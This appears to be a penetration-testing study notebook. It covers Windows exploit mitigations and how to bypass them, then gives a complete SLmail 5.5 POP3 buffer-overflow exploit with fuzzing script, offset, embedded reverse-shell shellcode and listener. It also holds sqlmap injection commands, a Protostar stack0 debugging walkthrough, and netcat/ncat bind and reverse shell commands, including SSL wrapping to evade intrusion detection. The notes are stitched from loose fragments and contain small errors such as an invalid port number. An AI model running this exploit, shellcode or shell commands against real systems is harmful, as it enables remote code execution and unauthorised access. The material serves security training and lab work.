Brute forcing: Brute forcing is a technique aimed at guessing valid memory addresses on systems running ASLR. If the targeted application has an exception handler that recovers the application after an unsuccessful function call, an attacker may use this condition to repeatedly execute the attack until the exploit finally succeeds.
Scope: Because ASLR is system-wide, the randomization of system libraries occurs once per reboot. Therefore, system libraries are loaded at the same locations in all processes between reboots.
Predictability: To reduce virtual private space fragmentation, libraries are relocated across 256 possible load addresses. Therefore, ASLR performs the randomization on the second most significant byte of an address making the actual load address more predictable.
Heap Defenses (Windows OS)
In order to protect against heap exploitation, Windows provides the following improvements in its heap implementation:
Checking the validity of forward and backward links: Each free block points to the previous and next free blocks. While the forward link points to the write location of the next free block, the backward link points to the forward link of the previous free block, thus making it difficult to overflow heap-based buffers without damaging the application’s heap.
Block metadata randomization: Using a random number, Windows performs an XOR operation on part of the block header. This makes determining the value to overwrite difficult.
Entry integrity check: Windows uses an 8-bit cookie to validate large part of the header.
Heap base randomization: The base address for heap allocations varies.
Heap function pointer randomization: Function pointers used by the heap are encoded.
Part of** Data Execution Prevention (DEP)** is a CPU bit that prevents applications from executing code from non-executable memory regions. This CPU bit is known as NX, short for No eXecute. When NX is specified, Windows checks every page in memory. If a memory page is marked as writable, the operating system will not execute it. Using NX in Windows will foil most exploits based on buffer overflows.
NX provides no means to prevent attacks that use system calls to disable DEP. In a typical scenario, an attacker would call NtSetInformationProcess with a bitmask that has the MEM_EXECUTE_OPTION_ENABLE bit set. Making this call from a high-privilege account would result in the operating system turning off DEP for that particular process.
There is no performance impact when using NX unless an exception is raised. However, using NX may raise backward compatibility issues. Because certain third-party components create assembly code on the fly, an application using these components will not be NX-compatible. In such cases, it is recommended to disable write operations to the memory pages that host the generated assembly code while executing the code.
The Canary Check aka /GS (Windows OS)
/GS is not a foolproof solution against buffer overrun attacks. There are various techniques that allow attackers to exploit a buffer overflow in applications protected by /GS. The following list identifies different ways to circumvent the /GS protection:
An attacker may overwrite the expected value of the canary cookie with its original value in order to pass the canary check.
An attacker may overwrite the security handler that is executed when the canary check fails.
An attacker may overwrite the buffer where the location of the Windows system directory is stored. This will allow the attacker to inject his/her own version of faultrep.dll, a DLL that is loaded when an application abruptly terminates due to a failed canary check.
An attacker may overwrite in-memory code segments that are known to execute when a canary check fails.
**The **/SAFESEH compiler flag (Windows OS)
When the /SAFESEH compiler flag is specified, the addresses of registered exception handlers are stored in a lookup table. This table is stored at a safe memory location so that it cannot be tampered with. Note that the /SAFESEH switch only applies to x86 platforms. In our exploitation scenario, the attacker overflows a buffer and overwrites the address of an exception handler with the address of the shellcode. The attacker then triggers an exception in an attempt to redirect the program execution to the malicious code. Before executing the malicious exception handler, the program compares the address contained in the handler registration with the value saved in the lookup table. As the two values do not match, execution is not allowed and the program is terminated.
Code review to detect Buffer Overflows
A good strategy for detecting buffer overflows is to trace all input from where it is submitted to the application down to the buffers where it is intended to be stored. Use the following steps to guide you through this process:
Identify all entry points. Enumerate all entry points to your team’s component or application. Entry points include UI components, network interfaces, COM objects, other processes, files on disk, and registry keys.
Trace all input to the appropriate buffers. Using all available means (data flow diagrams, static analysis tools, source code), trace each piece of input data to the buffers where it is stored. Keep in mind that data can be transformed or malformed.
Ensure that each buffer is sufficiently large. Verify that each buffer is sufficiently large to store the expected input data. Keep in mind that data may increase or decrease in length before it is finally stored.
Another technique for detecting potential buffer overflows is to look for known and potentially dangerous constructs. Once such construct is found, trace the data back to the point of entry. If the data comes from untrusted source or is not validated close to where it is copied from one buffer into another, it is likely that there is a security bug. PREfix and PREfast are tools that are able to detect such constructs. See the PREfix and PREfast pages for more information.
Linux Debugger Frontent for gdb: http://www.gnu.org/software/ddd/
Example: Exploiting SLmail 5.5 POP3 Server
Python Script to connect to POP3 Server and sending multiple ‘AAAAA’ when prompted for password:
#!/usr/bin/python
Importing the socket module
import socket
Create an array of buffers, from 1 to 5900, with increments of 200
buffer = ["A"] counter = 100 while len(buffer) <= 30: buffer.append("A"*counter) counter=counter+200
for string in buffer: print "Fuzzing PASS with %s bytes" % len(string) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.11.7.94' ,110)) s.recv(1024) s.send('USER test\n') s.recv(1024) s.send('PASS ' + string + '\n') s.send('QUIT\n') s.close()
Monitoring the traffic:
Somewhere around sending 5900 bytes of ‘AAAAA’ the application crashes due to an exception.
We have overwritten the stack pointer (EIP) with ‘AAAAA’ -> (41414141)
** ** We need to know the exact place to inject the code so it overwrites the EIP.
So we generate a string which is 5900 characters long and send this to SLmail. Now we know where it hits the EIP (7A46317A) and we can lookup the position in the generated pattern -> Offset 4654
We adjust the python script:
#buffer = 'A' * 5900
#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho'
buffer = "A" * 4654 + "B" * 4 + "C" *(5900-4654-4)
We are sending ‘A’ 4654 times, then ‘B’ 4 times (this should hit EIP) and fill the rest with ‘C’.
We now control the ESP and EIP register.
Using msvenom to create the shellcode, excluding bad characters (0x00, 0x0a, 0x0d):
The final script:
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shellcode=("\xbb\x20\x24\x16\xdd\xdb\xd4\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" "\x52\x83\xee\xfc\x31\x5e\x0e\x03\x7e\x2a\xf4\x28\x82\xda\x7a" "\xd2\x7a\x1b\x1b\x5a\x9f\x2a\x1b\x38\xd4\x1d\xab\x4a\xb8\x91" "\x40\x1e\x28\x21\x24\xb7\x5f\x82\x83\xe1\x6e\x13\xbf\xd2\xf1" "\x97\xc2\x06\xd1\xa6\x0c\x5b\x10\xee\x71\x96\x40\xa7\xfe\x05" "\x74\xcc\x4b\x96\xff\x9e\x5a\x9e\x1c\x56\x5c\x8f\xb3\xec\x07" "\x0f\x32\x20\x3c\x06\x2c\x25\x79\xd0\xc7\x9d\xf5\xe3\x01\xec" "\xf6\x48\x6c\xc0\x04\x90\xa9\xe7\xf6\xe7\xc3\x1b\x8a\xff\x10" "\x61\x50\x75\x82\xc1\x13\x2d\x6e\xf3\xf0\xa8\xe5\xff\xbd\xbf" "\xa1\xe3\x40\x13\xda\x18\xc8\x92\x0c\xa9\x8a\xb0\x88\xf1\x49" "\xd8\x89\x5f\x3f\xe5\xc9\x3f\xe0\x43\x82\xd2\xf5\xf9\xc9\xba" "\x3a\x30\xf1\x3a\x55\x43\x82\x08\xfa\xff\x0c\x21\x73\x26\xcb" "\x46\xae\x9e\x43\xb9\x51\xdf\x4a\x7e\x05\x8f\xe4\x57\x26\x44" "\xf4\x58\xf3\xcb\xa4\xf6\xac\xab\x14\xb7\x1c\x44\x7e\x38\x42" "\x74\x81\x92\xeb\x1f\x78\x75\x1e\xeb\x82\x1e\x76\xe9\x82\x31" "\xdb\x64\x64\x5b\xf3\x20\x3f\xf4\x6a\x69\xcb\x65\x72\xa7\xb6" "\xa6\xf8\x44\x47\x68\x09\x20\x5b\x1d\xf9\x7f\x01\x88\x06\xaa" "\x2d\x56\x94\x31\xad\x11\x85\xed\xfa\x76\x7b\xe4\x6e\x6b\x22" "\x5e\x8c\x76\xb2\x99\x14\xad\x07\x27\x95\x20\x33\x03\x85\xfc" "\xbc\x0f\xf1\x50\xeb\xd9\xaf\x16\x45\xa8\x19\xc1\x3a\x62\xcd" "\x94\x70\xb5\x8b\x98\x5c\x43\x73\x28\x09\x12\x8c\x85\xdd\x92" "\xf5\xfb\x7d\x5c\x2c\xb8\x8e\x17\x6c\xe9\x06\xfe\xe5\xab\x4a" "\x01\xd0\xe8\x72\x82\xd0\x90\x80\x9a\x91\x95\xcd\x1c\x4a\xe4" "\x5e\xc9\x6c\x5b\x5e\xd8") buffer = "A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode try: print "\nSending evil buffer ..." s.connect(('10.11.7.94' ,110)) data = s.recv(1024) s.send('USER username' + '\n') data = s.recv(1024) s.send('PASS ' + buffer + '\n') s.close() print "\nDone!" except: print "Unable to connect to POP3"
Listening on port 4444 and waiting for a connection from the reverse shell, then executing the script:
** **
Capture the Flag
ctcft.io 0) Caesar https://en.wikipedia.org/wiki/Caesar_cipher
a = "uiftfdsfuqbttqisbtfjtpgtqyrdhekuqsxjdtvyvkghlpvkfml" for i in range(0,26): dec = "" for c in a: if ord(c)>=ord('a') and ord(c)<=ord('z'): dec += chr((((ord(c)-ord('a'))+i)%26)+ord('a')) elif ord(c)>=ord('A') and ord(c)<=ord('Z'): dec += chr((((ord(c)-ord('A'))+i)%26)+ord('A')) else: dec += c print dec
ctcft.io 15) SQL Injection
sqlmap -u http://10.0.0.142/login.php --data=username="admin&password=password”
sqlmap -u http://192.168.1.1/Docsis_system.asp --data=username="admin&password=password”
VDP Vulnerability https://www.cvedetails.com/cve/CVE-2016-7456/ http://plugins.openvas.org/nasl.php?oid=140103
CTF - Protostar **Stack0 **
stack0.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char ******argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } }
$ man gets
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF,
which it replaces with '\0'. No check for buffer overrun is performed (see BUGS below).
$ gdb /opt/protostar/bin/stack0 (gdb) break *main Breakpoint 1 at 0x80483f4: file stack0/stack0.c, line 6. (gdb) set disassembly-flavor intel (gdb) run Starting program: /opt/protostar/bin/stack0
Breakpoint 1, main (argc=1, argv=0xbffffda4) at stack0/stack0.c:6 6 stack0/stack0.c: No such file or directory. in stack0/stack0.c (gdb) disassemble Dump of assembler code for function main: 0x080483f4 <main+0>: push ebp 0x080483f5 <main+1>: mov ebp,esp 0x080483f7 <main+3>: and esp,0xfffffff0 0x080483fa <main+6>: sub esp,0x60 0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0 0x08048405 <main+17>: lea eax,[esp+0x1c] 0x08048409 <main+21>: mov DWORD PTR [esp],eax 0x0804840c <main+24>: call 0x804830c gets@plt 0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c] 0x08048415 <main+33>: test eax,eax 0x08048417 <main+35>: je 0x8048427 <main+51> 0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500 0x08048420 <main+44>: call 0x804832c puts@plt 0x08048425 <main+49>: jmp 0x8048433 <main+63> 0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529 0x0804842e <main+58>: call 0x804832c puts@plt 0x08048433 <main+63>: leave 0x08048434 <main+64>: ret End of assembler dump. (gdb) del Delete all breakpoints? (y or n) y (gdb) break *0x0804840c Breakpoint 2 at 0x804840c: file stack0/stack0.c, line 11. (gdb) break *0x08048411 Breakpoint 3 at 0x8048411: file stack0/stack0.c, line 13. (gdb) define hook-stop Type commands for definition of "hook-stop". End with a line saying just "end".
info registers x/24wx $esp x/21 $eip end (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /opt/protostar/bin/stack0 eax 0xbffffcac -1073742676 ecx 0x874b21be -2025119298 edx 0x1 1 ebx 0xb7fd7ff4 -1208123404 esp 0xbffffc90 0xbffffc90 ebp 0xbffffcf8 0xbffffcf8 esi 0x0 0 edi 0x0 0 eip 0x804840c 0x804840c <main+24> eflags 0x200286 [ PF SF IF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 0xbffffc90: 0xbffffcac 0x00000001 0xb7fff8f8 0xb7f0186e 0xbffffca0: 0xb7fd7ff4 0xb7ec6165 0xbffffcb8 0xb7eada75 0xbffffcb0: 0xb7fd7ff4 0x08049620 0xbffffcc8 0x080482e8 0xbffffcc0: 0xb7ff1040 0x08049620 0xbffffcf8 0x08048469 0xbffffcd0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcf8 0xbffffce0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000 0x804840c <main+24>: 0xfffefbe8 0x24448bff 0x74c0855c 0x2404c70e 0x804841c <main+40>: 0x08048500 0xffff07e8 0xc70cebff 0x85292404 0x804842c <main+56>: 0xf9e80804 0xc9fffffe 0x909090c3 0x90909090 0x804843c: 0x90909090 0x5de58955 0x26748dc3 0x27bc8d00 0x804844c: 0x00000000 0x57e58955 0x4fe85356 0x81000000 0x804845c <__libc_csu_init+12>: 0x0011c5c3
Breakpoint 2, 0x0804840c in main (argc=1, argv=0xbffffda4) at stack0/stack0.c:11
11 in stack0/stack0.c
(gdb) c Continuing. AAAAAAAAAAAAAAA
0xbffffc90: 0xbffffcac 0x00000001 0xb7fff8f8 0xb7f0186e 0xbffffca0: 0xb7fd7ff4 0xb7ec6165 0xbffffcb8 0x41414141 0xbffffcb0: 0x41414141 0x41414141 0x00414141 0x080482e8 0xbffffcc0: 0xb7ff1040 0x08049620 0xbffffcf8 0x08048469 0xbffffcd0: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffcf8 0xbffffce0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0x41414141 -> There are the AAAA ...
(gdb) c Continuing. AAAABBBBBBBBBBBBCCCCCCCCCCCCDDDDDDDDDDDDEEEEEEEEEEEEFFFFFFFFFFFF
0xbffffc90: 0xbffffcac 0x00000001 0xb7fff8f8 0xb7f0186e 0xbffffca0: 0xb7fd7ff4 0xb7ec6165 0xbffffcb8 0x41414141 0xbffffcb0: 0x42424242 0x42424242 0x42424242 0x43434343 0xbffffcc0: 0x43434343 0x43434343 0x44444444 0x44444444 0xbffffcd0: 0x44444444 0x45454545 0x45454545 0x45454545 0xbffffce0: 0x46464646 0x46464646 0x46464646 0x00000000
Netcat (nc & ncat)
Bindshell - Netcat Server on Windows, Client on Kali -> On Windows host, open a port and redirect to an .exe C:\Users\Administrator>nc -lvv -p 94444 -e cmd.exe
-> On Kali client, connect to this port
nc -nv 10.11.7.94 94444
Reverse Shell to avoid firewall -> On Windows host, open a port C:\Users\Administrator>nc -lvv -p 94444 -> On Kali client, connect to this port -> On Windows host, enter linux commands -> They will be executed on the remote Kali machine
Encrypt connection to avoid intrusion detection
-> On Windows host, allow only this IP, encrypt with ssl, and redirect to cmd.exe
C:\Users\Administrator>ncat -lvp 4444 -e cmd.exe --allow 10.11.0.155 --ssl Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to u
se a permanent one. Ncat: SHA-1 fingerprint: 1CE9 9E10 B109 E5D0 F2BE C20A C22E 7EF8 A371 B226 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.11.0.155:50096.
